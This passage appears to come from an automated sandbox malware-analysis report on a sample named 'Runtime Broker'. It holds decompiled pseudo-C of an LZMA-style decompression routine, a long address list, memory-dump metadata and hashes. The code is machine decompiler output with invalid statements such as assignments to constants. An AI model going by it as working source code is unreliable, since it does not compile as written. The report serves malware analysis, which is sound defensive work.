													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407090
0x00407090
0x00407090
0x00407090
0x00407096
0x0040709a
0x0040709e
0x004070a8
0x004070b6
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x004073c3
0x004073c3
0x004073c7
0x00000000
0x00000000
0x004073c9
0x004073d2
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073ea
0x00407403
0x00407406
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073fb
0x004073fe
0x004073fe
0x00407420
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c7
0x00000000
0x00000000
0x00000000
0x00407422
0x00407422
0x0040739b
0x0040739f
0x004074d7
0x004074d7
0x004074e1
0x004074e9
0x004074f0
0x004074f2
0x004074f9
0x004074fd
0x004074fd
0x004073a5
0x004073ab
0x004073b2
0x004073ba
0x004073ba
0x004073bd
0x00000000
0x004073bd
0x00407427
0x00407434
0x00407437
0x00407343
0x00407343
0x00407343
0x00406adf
0x00406adf
0x00406adf
0x00406ae8
0x00000000
0x00000000
0x00406aee
0x00406aee
0x00000000
0x00406af5
0x00406af9
0x00000000
0x00000000
0x00406aff
0x00406b02
0x00406b05
0x00406b08
0x00406b0c
0x00000000
0x00000000
0x00406b12
0x00406b12
0x00406b15
0x00406b17
0x00406b18
0x00406b1b
0x00406b1d
0x00406b1e
0x00406b20
0x00406b23
0x00406b28
0x00406b2d
0x00406b36
0x00406b49
0x00406b4c
0x00406b58
0x00406b80
0x00406b82
0x00406b90
0x00406b90
0x00406b94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b87
0x00406b88
0x00406b88
0x00000000
0x00406b84
0x00406b5a
0x00406b5e
0x00406b63
0x00406b63
0x00406b6c
0x00406b74
0x00406b77
0x00000000
0x00406b7d
0x00406b7d
0x00000000
0x00406b7d
0x00000000
0x00406b9a
0x00406b9a
0x00406b9e
0x0040744a
0x0040744a
0x00000000
0x0040744a
0x00406ba4
0x00406ba7
0x00406bb7
0x00406bba
0x00406bbd
0x00406bbd
0x00406bbd
0x00406bc0
0x00406bc4
0x00000000
0x00000000
0x00406bc6
0x00406bc6
0x00406bcc
0x00406bf6
0x00406bfc
0x00406c03
0x00000000
0x00406c03
0x00406bce
0x00406bd2
0x00406bd5
0x00406bda
0x00406bda
0x00406be5
0x00406bed
0x00406bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c35
0x00406c3b
0x00406c3e
0x00406c4b
0x00406c53
0x00000000
0x00000000
0x00406c0a
0x00406c0a
0x00406c0e
0x00407459
0x00407459
0x00000000
0x00407459
0x00406c14
0x00406c1a
0x00406c25
0x00406c25
0x00406c25
0x00406c28
0x00406c2b
0x00406c2e
0x00406c33
0x00000000
0x00000000
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407318
0x0040731c
0x004074cb
0x004074cb
0x00000000
0x004074cb
0x00407322
0x00407328
0x0040732f
0x00407337
0x0040733a
0x0040733d
0x0040733d
0x00407343
0x00407343
0x00000000
0x00000000
0x00406c5b
0x00406c5b
0x00406c5d
0x00406c60
0x00406cd1
0x00406cd1
0x00406cd4
0x00406cd7
0x00406cde
0x00406ce8
0x00000000
0x00406ce8
0x00406c62
0x00406c62
0x00406c66
0x00406c69
0x00406c6b
0x00406c6e
0x00406c71
0x00406c73
0x00406c76
0x00406c78
0x00406c7d
0x00406c80
0x00406c83
0x00406c87
0x00406c8e
0x00406c91
0x00406c98
0x00406c9c
0x00406ca4
0x00406ca4
0x00406ca4
0x00406c9e
0x00406c9e
0x00406c9e
0x00406c93
0x00406c93
0x00406c93
0x00406ca8
0x00406cab
0x00406cc9
0x00406cc9
0x00406ccb
0x00000000
0x00406cad
0x00406cad
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb8
0x00406cb8
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc1
0x00406cc4
0x00000000
0x00406cc4
0x00000000
0x00406efa
0x00406efa
0x00406efe
0x00406f1c
0x00406f1c
0x00406f1f
0x00406f26
0x00406f29
0x00406f2c
0x00406f2f
0x00406f32
0x00406f35
0x00406f37
0x00406f3e
0x00406f3f
0x00406f41
0x00406f44
0x00406f47
0x00406f4a
0x00406f4a
0x00406f4f
0x00000000
0x00406f4f
0x00406f00
0x00406f00
0x00406f03
0x00406f06
0x00406f10
0x00000000
0x00000000
0x00406f64
0x00406f64
0x00406f68
0x00406f8b
0x00406f8e
0x00406f91
0x00406f9b
0x00406f6a
0x00406f6a
0x00406f6d
0x00406f70
0x00406f73
0x00406f80
0x00406f83
0x00406f83
0x00000000
0x00000000
0x00406fa7
0x00406fa7
0x00406fab
0x00000000
0x00000000
0x00406fb1
0x00406fb1
0x00406fb5
0x00000000
0x00000000
0x00406fbb
0x00406fbb
0x00406fbd
0x00406fc1
0x00406fc1
0x00406fc4
0x00406fc8
0x00000000
0x00000000
0x00407018
0x00407018
0x0040701c
0x00407023
0x00407023
0x00407026
0x00407029
0x00407033
0x00000000
0x00407033
0x0040701e
0x0040701e
0x00000000
0x00000000
0x0040703f
0x0040703f
0x00407043
0x0040704a
0x0040704d
0x00407050
0x00407045
0x00407045
0x00407045
0x00407053
0x00407056
0x00407059
0x00407059
0x0040705c
0x0040705f
0x00407062
0x00407062
0x00407065
0x0040706c
0x00407071
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407103
0x004074a1
0x004074a1
0x00000000
0x004074a1
0x00407109
0x00407109
0x0040710c
0x0040710f
0x00407113
0x00407116
0x0040711c
0x0040711e
0x0040711e
0x0040711e
0x00407121
0x00407124
0x00000000
0x00000000
0x00406cf4
0x00406cf4
0x00406cf8
0x00407465
0x00407465
0x00000000
0x00407465
0x00406cfe
0x00406cfe
0x00406d01
0x00406d04
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d19
0x00406d1c
0x00406d1f
0x00000000
0x00000000
0x00406d25
0x00406d25
0x00406d2b
0x00000000
0x00000000
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5c
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d8f
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d98
0x00406d9f
0x00406da2
0x00000000
0x00406da8
0x00406da8
0x00000000
0x00406da8
0x00000000
0x00406dad
0x00406dad
0x00406db1
0x00407471
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df5
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e20
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e25
0x00406e2c
0x00406e2f
0x00000000
0x00406e31
0x00406e31
0x00000000
0x00406e31
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e36
0x00000000
0x00000000
0x00406e71
0x00406e71
0x00406e75
0x0040747d
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e90
0x00406e93
0x00406e96
0x00406e96
0x00406e9c
0x00406e3a
0x00406e3a
0x00406e3d
0x00000000
0x00406e3d
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee4
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ee9
0x00406ef0
0x00406ef3
0x00000000
0x00406ef5
0x00406ef5
0x00000000
0x00406ef5
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00406f52
0x00406f52
0x00406f55
0x00000000
0x00000000
0x00407291
0x00407291
0x00407295
0x004072b7
0x004072b7
0x004072ba
0x004072c4
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00407297
0x00407297
0x0040729a
0x0040729e
0x004072a1
0x004072a1
0x004072a4
0x00000000
0x00000000
0x0040734e
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00407385
0x00407385
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00407399
0x00407354
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x004072a8
0x004072a8
0x004072ab
0x00000000
0x00000000
0x0040743f
0x0040743f
0x00407442
0x00407343
0x00407343
0x00407343
0x00000000
0x00407349
0x00000000
0x00407079
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00407399
0x00000000
0x00000000
0x00000000
0x004070be
0x004070be
0x004070c1
0x004070f7
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x00407157
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x0040728c
0x00407009
0x00407009
0x00000000
0x00407009
0x0040728a
0x004074bf
0x004074bf
0x00000000
0x00000000
0x00406aee
0x004074f6
0x004074f6
0x00000000
0x004074f6
0x00407343
0x004073c3
0x0040738c

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407291, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407291() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
